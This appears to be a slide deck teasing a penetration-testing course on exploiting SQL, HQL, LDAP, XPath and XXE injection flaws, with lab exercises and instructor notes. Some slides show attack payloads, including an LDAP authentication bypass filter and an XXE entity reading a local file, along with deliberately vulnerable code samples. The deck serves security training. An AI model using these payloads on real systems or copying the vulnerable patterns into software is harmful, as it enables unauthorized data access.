Injection flaw teaser

  • 1. The Art Of Exploiting Injection Flaws Sumit Siddharth sid@notsosecure.com
  • 2. About the course  Hands on 2 days training  Require out of box thinking (strong coffee recommended!)  20 exercises, 100 slides, 8 CTFs!  Previous feedback:  “ This was the best course I have ever been on. Since attending the course, I have identified so many issues which automated tools have missed. Thanks a ton, Sid”  “I have been pentesting for 4 years now, and thought I knew all about SQLI. I guess I was wrong. If anyone knows this subject well, it is Sid”
  • 3. About Me Sumit “sid” Siddharth  Speaker/Trainer at Black Hat, Def con, OWASP Appsec, HITB, Ruxcon etc  My blog: www.notsosecure.com  Specialist in Application & Database Security!  More than 8 years of Pentesting!  Co-author: SQL Injection, attacks and defense  Head of Penetration testing@7Safe
  • 4. Day 1: SQL Injection
  • 5. Exploiting SQL Injections  Authentication Bypass  Extracting Data  Error Message Enabled  Error Message Disabled  Union Injection  Blind Injection  Time Delays  Out Of Band Channels  Privilege Escalation  OS code execution
  • 6. Exercise 9.8 – SQL Injection: OS command execution  http://hacklab.net/hackme_7.5/  Objective  Exploit SQL injection to run OS commands on the database server  CTF : What are the contents of C:secret.txt on the server  Time  10 mins
  • 7. Advanced SQL Injection  Insanely Blind SQL Injection  Application returns same response  Injection point in INSERT/UPDATE statement
  • 8. Encoding/Decoding User Input  Base64 decoding user input  Hex decoding user input  Real world examples  WordPress Admin-Ajax.php unauthenticated SQL injection  PHP-Nuke auth.php $cookie=explode(„;‟, urldecode(empty($_POST[„cookie‟]))) $admin=base64_decode($admin)
  • 9. SQL Injection in SQL Names  Consider the following: Dim cat, orderBy, query cat = Replace(Request.Form(“cat”), “‟”, “‟‟”) orderBy = Replace(Request.Form(“orderBy”), “‟”, “‟‟”) query = “SELECT * FROM prod WHERE cat = „” & cat & “‟ ORDER BY “ & orderBy
  • 10. Hacking Oracle from Web  Exploiting SQL Injection against oracle database  How to extract data  One Query to get them all!  How to execute OS code  What if we are not DBA  Become DBA  Execute OS code  Drop DBA
  • 11. Capture The Flag: SQL Injection  http://hacklab.net/ctf.asp?data=foobar  Objective • What’s in C:secret.txt  Time  20 Mins!  No instructions or hints this time!
  • 12. Day 2: The Art of Exploiting Lesser Known Injection Flaws ORM Injection LDAP Injection Advanced LDAP Injection XPath Injection Xpath v2 XML Entity Injection Combining Xpath and XXE CTF Q&A
  • 13. Hibernate Query Language Injection  User’s input to be passed directly to the underlying SQL engine List<Event> result = session.createQuery( "from Event e where e.title='" + param + "'").list();
  • 14. HACKING LDAP LDAP overview LDAP injection Blind LDAP injection Hacking LDAP in practice Securing Applications Against LDAP Injections
  • 15. LDAP Injection: Authentication Bypass  (&(user=username)(password=pwd))  Usually password is hashed and then matched with the stored value  Injection is most likely to work only in username field  (&(user=username)(password=*))  (&(user=username)(&))(password=pwd)) Anything after first filter will be ignored by OpenLDAP
  • 16. Exercise 6  http://hacklab2.net:81/ldap/selfservice/  PHP/LDAP  Find the telephone number of employee Eric Philip  Time: 10 mins
  • 17. XPATH Injection  Agenda  What is XPATH  Exploiting XPATH  Impact of XPATH exploitation  Blind XPATH Injection  Automating XPATH Injection  XPATH v2 injection  Insane XPATH Injection  Defending against XPATH Injection
  • 18. XPATH’s XML Nomenclature Root node Comment Node name Attribute value Node Node value Attribute name Node
  • 19. Automating Xpath  XPATH Explorer  Demo time!
  • 20.  Hugely increased feature set  Regular expressions  Unicode normalization  String to code point conversion  Remote document references  All of these can be utilised to speed up document retrieval and reduce the key space we have to search. XPath 2.0 Features..
  • 21. XPATH 2.0  Allows to not just read the current XML file but any arbitrary xml file on the file system.
  • 22. Hacking Web Services with XML External Entity  Not validating the xml files before processing it  Attacker can inject an external entity  <!ENTITY pwned SYSTEM "file:///c:/boot.ini" >  Web service parse the entity and the parser access the local resource  Unauthorized access to information  Post scanning  Denial of service attack  Breaking the xml syntax  Providing files like /dev/urandom
  • 23. Combining XXE and Xpath  Did I say, with Xpath 2.0 you can read arbitrary xml files on the file system.  I actually mean:  with Xpath 2.0 you can read arbitrary xml files on the file system.  Introducing Xcat
  • 24. Thank You!  Questions please...  Sid@notsosecure.com  Twitter: notsosecure

Editor's Notes

  1. Is following exercise ready? Not sure what it has to do with this slideExercise: SQL Injection in cookies
  2. MS-SQL escape quotes by doubling themWhat’s the problem? Orderby part does not require string to be vulnerable
  3. Run through Instructor Introduction first, having:- changed name on slide 2- ensured correct instructor slide unhidden